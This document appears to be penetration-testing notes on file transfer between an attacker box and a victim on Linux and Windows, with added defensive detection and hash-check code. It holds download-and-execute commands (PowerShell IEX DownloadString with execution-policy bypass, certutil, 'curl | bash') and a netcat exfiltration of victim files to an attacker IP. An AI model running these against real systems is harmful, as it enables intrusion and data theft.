File Transfers

Server

# HTTP - Apache2

# cp file /var/www/html/file_name

sudo service apache2 start

# HTTP - Python. Default port 8000

# python2

sudo python -m SimpleHTTPServer 80

# python3

sudo python3 -m http.server 80

# SMB

sudo impacket-smbserver <share_name> <path/to/share>

# FTP

# apt-get install python-pyftpdlib

sudo python -m pyftpdlib -p 21

# TFTP (UDP)

sudo atftpd --daemon --port 69 /path/to/serve

# Netcat

nc -nvlp <port> < file/to/send

Linux - HTTP

# Wget

wget http://<ip>/file_name -O /path/to/save/file

# Netcat

nc -nv <ip> <port> > file/to/recv

# cURL

curl http://<ip>/file_name --output file_name

Windows

HTTP

# Does not save file on the system

powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<ip>/<file_name>')"

# Saves file on the system

powershell.exe -nop -ep bypass -c "iwr -uri http://<ip>/<file_name> -outfile path/to/save/file_name"

powershell.exe -nop -ep bypass -c "(New-Object Net.WebClient).DownloadFile('http://<ip>/<file_name>','path/to/save/file_name')"

certutil.exe -urlcache -split -f http://<ip>/file file_save

Wget.ps1 (script)

echo $storageDir = $pwd >> wget.ps1

echo $webclient = New-Object System.Net.WebClient >> wget.ps1

# Download file from

echo $url = "http://<ip>/file_name" >> wget.ps1

# Save file as

echo $file = "file_name" >> wget.ps1

echo $webclient.DownloadFile($url,$file) >> wget.ps1

# execute the script as follows

powershell.exe -nop -ep bypass -nol -noni -f wget.ps1

TFTP (UDP)

tftp -i <ip> get file_name

SMB

# cmd.exe

net use Z: \\<attacker_ip>\share_name

# To access the drive

Z:

# PowerShell

New-PSDrive -Name "notmalicious" -PSProvider "FileSystem" -Root "\\<attacker_ip>\share_name"

# To access the drive

cd notmalicious:

FTP

ftp <ip>

ftp> binary

ftp> get file_name

# One-liner downloader

# in cmd.exe do not use quotes in an echo command

echo open <ip> >> download.txt

echo anonymous >> download.txt

echo anon >> download.txt

echo binary >> download.txt

echo get file_name >> download.txt

echo bye >> download.txt

ftp -s:download.txt
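
From the defender's side, each Windows technique above leaves a recognisable process command line. The added example below (not part of the original notes) matches constructed sample command lines against patterns taken from the commands on this page; the rule names, host names and the 192.0.2.10 address are assumptions for illustration.

```python
import re

# Heuristic patterns derived from the command shapes listed on this page.
RULES = [
    ("certutil_urlcache", re.compile(r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*\bhttps?://", re.I)),
    ("ps_webclient_download", re.compile(r"\bNet\.WebClient\b.*\.Download(String|File)\s*\(", re.I)),
    ("ps_iwr_outfile", re.compile(r"\b(iwr|wget|curl|Invoke-WebRequest)\b.*-outfile\b", re.I)),
    ("ps_exec_policy_bypass", re.compile(r"\bpowershell(\.exe)?\b.*-(ep|executionpolicy)\s+bypass\b", re.I)),
    ("ftp_script_file", re.compile(r"\bftp(\.exe)?\b\s+.*-s:\S+", re.I)),
    ("tftp_get", re.compile(r"\btftp(\.exe)?\b\s+-i\s+\S+\s+get\b", re.I)),
    # A share mapped by raw IP instead of a host name is unusual on most networks.
    ("smb_map_by_ip", re.compile(r"\b(net\s+use|New-PSDrive)\b.*\\\\\d{1,3}(\.\d{1,3}){3}\\", re.I)),
]

def classify(command_line):
    """Return the names of every rule the command line matches, in rule order."""
    return [name for name, pattern in RULES if pattern.search(command_line)]

def scan(events):
    """events: iterable of (host, command_line); returns (host, rules, command_line) hits."""
    hits = []
    for host, cmd in events:
        rules = classify(cmd)
        if rules:
            hits.append((host, rules, cmd))
    return hits

# Constructed process-creation events (not real telemetry); two are benign on purpose.
SAMPLE_EVENTS = [
    ("ws01", "powershell.exe -nop -ep bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')\""),
    ("ws01", "certutil.exe -urlcache -split -f http://192.0.2.10/file file_save"),
    ("ws02", "certutil.exe -hashfile C:\\Temp\\setup.exe SHA256"),
    ("ws02", "ftp -s:download.txt"),
    ("ws03", r"net use Z: \\192.0.2.10\share_name"),
    ("ws03", r"net use Z: \\fileserver01\dept"),
    ("ws04", "tftp -i 192.0.2.10 get file_name"),
    ("ws04", 'powershell.exe -nop -ep bypass -c "iwr -uri http://192.0.2.10/f -outfile C:\\Temp\\f"'),
]

if __name__ == "__main__":
    for host, rules, cmd in scan(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(rules)} <- {cmd}")
```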

Host Webserver Method 1

  • Move files into your /var/www/html folder

  • service apache2 start

    • To start your web server

  • wget <your attacking machine's ip>/<path to file>

    • Run this from the victim machine

Host Webserver Method 2

  • Navigate to the directory that you want to serve over HTTP

  • python -m SimpleHTTPServer

  • python3 -m http.server

    • To start a webserver (runs on port 8000 by default)

  • curl <your attacking machine's ip>:8000/<file name> | bash

    • Fetches the file from your webserver and pipes it straight into bash, so the script is executed rather than saved to disk

    • Run this command from the victim machine

nc transfer from victim machine to attacker machine

  • On the attacker machine, set up a netcat listener on some port (e.g. 999)

nc -l -p <listener port> > <file name that you want to direct the input to>

E.g.

nc -l -p 999 > ovrflw

  • On the victim machine (shell)

nc -w 5 <attacker IP> <attacker LPORT> < <path to file to send>

E.g.

nc -w 5 10.10.14.9 999 < /usr/local/bin/ovrflw

SCP

  • Use this when you have login credentials

  • Run from the attacker machine

scp <user>@<ip address>:<file name> .

  • A relative <file name> is resolved from the user's home directory on the remote host

Invoke-WebRequest (wget) - PowerShell

File Hosting (from attacker machine)

=====HTTP Method=====

  • Use Apache or python -m from your attacker box

python -m SimpleHTTPServer

With Python3

python3 -m http.server <port #>

=====FTP Method=====

apt-get install python-pyftpdlib

  • cd to the directory where the files that you want to transfer are located

python -m pyftpdlib -p 21

File Transferring (from Windows target)

=====PowerShell=====

wget <URL> -OutFile <output file name>

PS> IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.16/empire.ps1')

OR

# Create a web client object

$webClient = New-Object System.Net.WebClient

# Create file path you want to save it to

$filename = "<path to file>"

# Downloads the file and saves it as $filename

Add-Content -Path $filename -Value $webClient.DownloadString('https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Cracked-Hashes/milw0rm-dictionary.txt')

Without PowerShell

certutil -urlcache -f <URL> <output file name>

  • this transfer method can sometimes mess up binary executables
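
The corruption risk noted above can be checked for by comparing a SHA-256 digest taken on the serving machine with one taken after the transfer. This is an added example, not part of the original notes; the file names are hypothetical and the bytes are constructed, and the corruption it simulates is the LF to CRLF rewriting of a text-mode FTP transfer, which is why the FTP steps on this page issue `binary`.

```python
import hashlib
import hmac
import os
import tempfile

def sha256_file(path, chunk_size=65536):
    """Stream the file so large binaries are hashed without loading them whole."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify_transfer(received_path, expected_hex):
    """True only if the received file matches the digest taken on the sending side."""
    return hmac.compare_digest(sha256_file(received_path), expected_hex.strip().lower())

def ascii_mode_rewrite(data):
    """Assumed corruption model: a text-mode transfer turns every bare LF into CRLF."""
    return data.replace(b"\r\n", b"\n").replace(b"\n", b"\r\n")

def demo():
    # Constructed sample: binary-looking bytes that contain three 0x0A values.
    original = b"MZ\x90\x00\x0a\x03\x00\x0a\xff\xfe" + bytes(range(256))
    with tempfile.TemporaryDirectory() as workdir:
        sent = os.path.join(workdir, "sent.bin")
        good = os.path.join(workdir, "recv_binary.bin")
        bad = os.path.join(workdir, "recv_ascii.bin")
        for path, data in ((sent, original), (good, original),
                           (bad, ascii_mode_rewrite(original))):
            with open(path, "wb") as fh:
                fh.write(data)
        expected = sha256_file(sent)  # digest computed on the serving machine
        return {
            "binary_mode_ok": verify_transfer(good, expected),
            "ascii_mode_ok": verify_transfer(bad, expected),
            "size_delta": os.path.getsize(bad) - os.path.getsize(sent),
        }

if __name__ == "__main__":
    print(demo())
```

On the hosts themselves the same digests can be produced with `sha256sum <file>` on Linux and `certutil -hashfile <file> SHA256` on Windows.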

=====FTP=====

ftp <attacker ip address>

login: anonymous

password: anonymous

*** ftp -A <ip address> is a shortcut for anonymous ftp login

ftp> binary

ftp> get <file name>

=====FTP (scripted method)=====

echo open <attacker ip> <ftp port> > ftp.txt

echo anonymous >> ftp.txt

echo anonymous >> ftp.txt

echo binary >> ftp.txt

echo get <file name> >> ftp.txt

echo bye >> ftp.txt

  • run ftp with this file

ftp -s:ftp.txt

# e.g. contents of the resulting ftp.txt

open 10.11.0.76 21

anonymous

anonymous

binary

get nc.exe

bye

=====Metasploit Method=====

This method assumes that you already have a meterpreter shell on the Windows target

  • From meterpreter you can upload a file to the target or download a file from the target

e.g.

upload /root/ft/exploit.txt C:\\Users\\Heath\\Desktop

  • When specifying the destination on the Windows filesystem, each backslash must be escaped with another backslash
